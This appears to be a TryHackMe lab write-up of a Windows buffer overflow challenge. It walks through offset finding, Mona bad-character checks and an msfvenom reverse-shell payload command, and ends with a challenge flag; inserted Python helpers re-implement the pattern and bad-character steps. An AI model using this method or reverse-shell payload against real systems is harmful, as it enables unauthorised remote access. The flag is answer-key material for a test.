Buffer Overflow Challenge: Testing Organization
Challenge
Tester's Name: pavanmsvs
TryHackMe ID: noobsyntax
Test Date: 03/07/2021
The purpose of this test was to find a vulnerability in the given application and use it to gain user access.

Nmap was used to check which port the application is running on, msfvenom to create the payload, and the Metasploit Framework pattern tools (pattern_create and pattern_offset) to find the offset value.
From the nmap scan we can see that only two ports are open, 31337 and 8888, where our application is running. We are already provided with a skeleton of the code; we have to use that skeleton and modify it to gain user access. From the other port, in the bin directory, we got the vulnerable application, downloaded it and transferred it to our testing machine, where we will test our code and try to gain user access.
We can download the vulnerable application and start testing on our Windows machine.
EXPLOITING THE TARGET
Now we will start our testing on the local development system using the skeleton.

We used the skeleton and only modified the IP, as shown, to that of my local testing system. We opened the application on the testing system in Immunity Debugger, where we can watch the application's details and how our code affects it.
As we can see, the application is running; now we will try our crash code by simply executing it from our attacking system.

As the application crashed from the 500 "A"s sent to it, we will create a pattern of that length and try the crash once more with our pattern to get the offset value.

For this we will use the Metasploit tool pattern_create.rb; this script creates a non-repeating character pattern of the length we specify:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500

(-l --> length of the pattern). Now we will put this pattern in place of the "A"s in our skeleton code.

Now that we have created the code with our 500-character pattern, we will execute it to get the offset value (the exact crash point of the application).
After executing our code we see the EIP value, which we will use to find the offset of the application, and at the ESP address we can see our pattern. For finding the offset we will use another Metasploit tool, pattern_offset.rb, which gives the application's offset value.

As seen above, using the EIP value we found the offset of the application, which is 146. Now we will use this value in our code to control EIP.
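The two pattern steps above (create a pattern, then map the bytes seen in EIP back to an offset) are easy to reproduce without the Ruby tools, which helps when triaging a crash on a machine that has no Metasploit install. The following is an added example written for this report, not code from the original report or from Metasploit; it re-implements the same three-byte group scheme that pattern_create.rb uses, and the register value used in the example is constructed (it is the dword that sits at offset 146 of a 500-byte pattern; the report does not show its actual EIP value).

```python
# Added example (not from the report or from Metasploit): a small
# reimplementation of what pattern_create.rb and pattern_offset.rb do, so the
# offset step of the crash triage can be reproduced offline.
import string
import struct
from typing import Optional


def cyclic_pattern(length: int) -> bytes:
    """Build the Metasploit-style pattern Aa0Aa1...Aa9Ab0... out of three-byte
    groups (upper, lower, digit). Every 4-byte window is unique across the
    full 20280-byte pattern, so the 4 bytes seen in a register identify one
    offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])  # caller asked for more than the pattern supplies


def find_offset(pattern: bytes, register_hex: str) -> Optional[int]:
    """Locate the bytes that overwrote EIP. On x86 the debugger shows the
    dword little-endian, so a register value of 0x39654138 means the bytes
    "8Ae9" were in memory. Returns None when the value is not from the pattern
    (e.g. 41414141 from the plain "A" crash)."""
    value = int(register_hex, 16)
    for fmt in ("<I", ">I"):  # little-endian first, as pattern_offset.rb does
        idx = pattern.find(struct.pack(fmt, value))
        if idx != -1:
            return idx
    return None


if __name__ == "__main__":
    pat = cyclic_pattern(500)
    print(pat[:12])                      # b'Aa0Aa1Aa2Aa3'
    # Constructed register value: the dword at offset 146 of the pattern.
    print(find_offset(pat, "39654138"))  # 146
    print(find_offset(pat, "41414141"))  # None
```

A None result is the useful signal in practice: it means EIP was not overwritten by the pattern bytes at all (a stale value, or bytes mangled before they reached the stack), so the crash needs a closer look rather than a guessed offset.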
We will use the skeleton with the offset value in it and pass "B" as the extra characters to get EIP control.

As seen at EIP, we got the ASCII value of the extra characters we passed, i.e. 42424242. As we have control of EIP, we will now find the bad characters in the application. For this we will use the built-in Mona module of Immunity Debugger. We will configure a log folder first and then create a byte array using Mona.
!mona config -set workingfolder c:\logs\%p --> to configure log folder
Once we have created the byte array using Mona, we copy it into our code and execute it. We can simply add it as the bad characters and append it to the buffer, or pass it as the buff value after the value given in the skeleton. Once we execute our code we will see the bad characters present in the application, which we have to remove.
!mona bytearray -b "\x00"

We can see that it is saying corruption after 0 bytes; we will remove that character from the byte array and execute the code again. To remove the bad character from the log we use the mona command above.

Similarly, we will remove the bad character from our code as well and execute it to see if any other bad character is present.
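The bad-character loop above (send a byte array, compare the memory dump with what was sent, drop the first corrupted byte, repeat) is what "!mona bytearray" and "!mona compare" automate. The following is an added example, not code from the report, Mona or Metasploit, that performs the same comparison in Python so the "corruption after N bytes" message can be reasoned about offline. The target behaviour (simulate_target) is a constructed stand-in for reading the dump back from the debugger: it models a line-oriented string copy that stops at the first NUL or newline, which reproduces the two bad characters the report ends up excluding.

```python
# Added example (not from the report, Mona or Metasploit): the send/compare
# loop behind the bad-character step, with a constructed target model.
from typing import Callable, Iterable, List, Optional, Tuple


def build_bytearray(exclude: Iterable[int] = ()) -> bytes:
    """All byte values 0x00..0xff in order, minus the ones already known to be
    bad (what "!mona bytearray -b '\\x00'" writes out)."""
    skip = set(exclude)
    return bytes(b for b in range(256) if b not in skip)


def first_corruption(sent: bytes, dump: bytes) -> Optional[Tuple[int, int]]:
    """Compare what was sent with what was read back from the target's memory.
    Returns (index, sent_byte) for the first mismatch, the same information as
    Mona's "corruption after <index> bytes", or None when the dump matches."""
    for i, b in enumerate(sent):
        if i >= len(dump) or dump[i] != b:
            return i, b
    return None


def triage_bad_chars(read_back: Callable[[bytes], bytes], max_rounds: int = 16) -> List[int]:
    """Repeat send/compare until the dump matches. Each round can only prove
    the first bad byte, because everything after it is shifted or mangled,
    which is why the report removes one character and runs again."""
    bad: List[int] = []
    for _ in range(max_rounds):
        sent = build_bytearray(bad)
        hit = first_corruption(sent, read_back(sent))
        if hit is None:
            break
        bad.append(hit[1])
    return bad


def simulate_target(data: bytes) -> bytes:
    """Constructed stand-in for reading the dump out of the debugger: a
    line-oriented string copy that stops at the first NUL or newline."""
    end = len(data)
    for stop in (0x00, 0x0a):
        pos = data.find(bytes([stop]))
        if pos != -1:
            end = min(end, pos)
    return data[:end]


if __name__ == "__main__":
    # Round 1 reports corruption after 0 bytes (0x00), round 2 after 9 bytes
    # (0x0a), round 3 matches; the result is the -b list used later.
    print([hex(b) for b in triage_bad_chars(simulate_target)])  # ['0x0', '0xa']
```

Swapping simulate_target for a function that returns the bytes dumped from ESP in the debugger turns this into a real triage helper; the per-round limitation stays the same, so one comparison per excluded byte is the minimum number of crashes needed.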
Now we are set to create our payload using msfvenom to gain user control and get shell access to the testing system.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.8 lport=4444 -b "\x00\x0a" -f python
We copy this buf value into our code, change it as per the skeleton provided, and add the ESP value and the NOP padding. Padding = "\x90" * 16
On executing our shellcode we got the local system shell, so we successfully created shellcode that gave us local system access. Now we will create the payload for the THM machine; as we are connected through the VPN, we will use the tun0 IP in the payload and change the target IP in our code.
Proof flag: - 40E44BACF8B1464C8882D08160F6EF4A4FCC4676
We successfully got user access to the system and obtained the flag, which was submitted in THM.